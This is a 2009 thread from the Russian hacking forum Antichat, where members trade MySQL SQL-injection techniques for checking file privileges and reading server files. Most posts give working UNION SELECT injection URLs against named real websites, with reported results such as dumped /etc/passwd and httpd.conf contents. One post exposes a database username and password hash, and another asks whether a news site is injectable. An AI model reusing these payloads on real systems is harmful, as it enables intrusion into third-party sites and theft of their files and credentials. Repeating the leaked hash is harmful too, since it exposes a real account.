Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
28.07.2009, 17:37
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Pashkela, спасбо.
load_file не хочет работать, ошибку выдает.
Можно ли как нибуть проверить , чтобы уточнить есть ли парва на чтение и запись файлов у юзера в БД 5 версии?
Ну чтобы выводило Y или N
Последний раз редактировалось SeNaP; 28.07.2009 в 17:39..
|
|
|
28.07.2009, 17:41
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
SeNaP
Так как ты написал
union+select+file_priv+from+mysql.user+where+user= 'имя юзера'
если маджики включены, то перевести в hex, а с лоад_файл это не вполне точный метод, бывают ньюансы
Сообщение от Pashkela
1. Пару раз встречал сайты, где значение file_priv в БД было N, а load_file работал
Это врятли
Последний раз редактировалось jokester; 28.07.2009 в 17:48..
|
|
|
|
28.07.2009, 18:21
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
jokester:
Код:
http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,user()+from+mysql.user/*
Ответ: tltltl@info.umb.edu
http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,file_priv+from+mysql.user/*
Ответ: N
http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,load_file('/etc/passwd')/*
Ответ: содержимое /etc/passwd
---------------------------------------------------------------------------------------
Или еще может быть такая ситуация:
http://www.thiederman.com/products_detail.php?id=-10+union+select+1,file_priv,3,4,5,6+from+mysql.user--
Ответ: Couldn't execute query
Но запрос:
http://www.thiederman.com/products_detail.php?id=-10+union+select+1,load_file('/etc/passwd'),3,4,5,6--
- положительный
Ну хз, может я чего не понимаю
По поводу пункта 1 пример:
Код:
http://www.kasparov.ru/subject.php?id=-74'+union+select+user()+from+mysql.user/*
Ответ: editor@192.168.1.70
http://www.kasparov.ru/subject.php?id=-74'+union+select+file_priv+from+mysql.user+where+user()='editor@192.168.1.70'/*
Ответ: Y
http://www.kasparov.ru/subject.php?id=-74'+union+select+load_file('/etc/httpd/conf/httpd.conf')/*
Ответ: содержимое /etc/httpd/conf/httpd.conf (в сорцах)
|
|
|
|
28.07.2009, 18:30
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663
Репутация:
240
|
|
Код:
http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,file_priv+from+mysql.user/*
Звезды говорят о другом...
Код:
User name: tltltl@info.umb.edu
Fields user:password:file_Priv:host
[43]:tltltl:2e52490f15206ead:Y:%
Вот так
Код:
http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,file_priv+from+mysql.user+where+user='tltltl'/*
Последний раз редактировалось The_HuliGun; 28.07.2009 в 18:35..
|
|
|
|
28.07.2009, 18:33
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
))) Ок, был неправ, погорячился  ))
Всегда надо юзать where user=, а лучше не заморачиваться и сразу load_file
Последний раз редактировалось Pashkela; 28.07.2009 в 18:48..
|
|
|
|
28.07.2009, 18:50
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Pashkela ты издеваешься что-ли?
Как по твоему что выводит этот запрос?
http://www.gaston.umb.edu/publications/pub_overview_demography.php?id=-99999'+union+select+1,2,file_priv+from+mysql.user/*
|
|
|
|
28.07.2009, 18:57
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Ааааа, я больше не буду )) Просто большиство, насколько я знаю, where не пользуют, поэтому и привёл пример, для наглядности |
|
|
|
28.07.2009, 19:02
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Без where как раз это не имеет смысла делать. Непонятно что за запись тебе выдаст база.
Ну или хотя-бы concat_ws(0x3a,user,file_priv) а там уже искать своего юзера
|
|
|
|
28.07.2009, 19:38
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Код:
select file_priv from mysql.user where user=substring_index(user(),0x40,1) and host=substring_index(user(),0x40,-1)
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
29.07.2009, 02:56
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055
Репутация:
347
|
|
Код:
http://censor.net.ua/go/offer/ResourceID/12235-4.html
http://censor.net.ua/go/offer/ResourceID/12231.html
совпадают, то есть вроде как признак sql инъекции. Но более ничего не подтверждает это. Возможно ли тут запроса внедрение? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
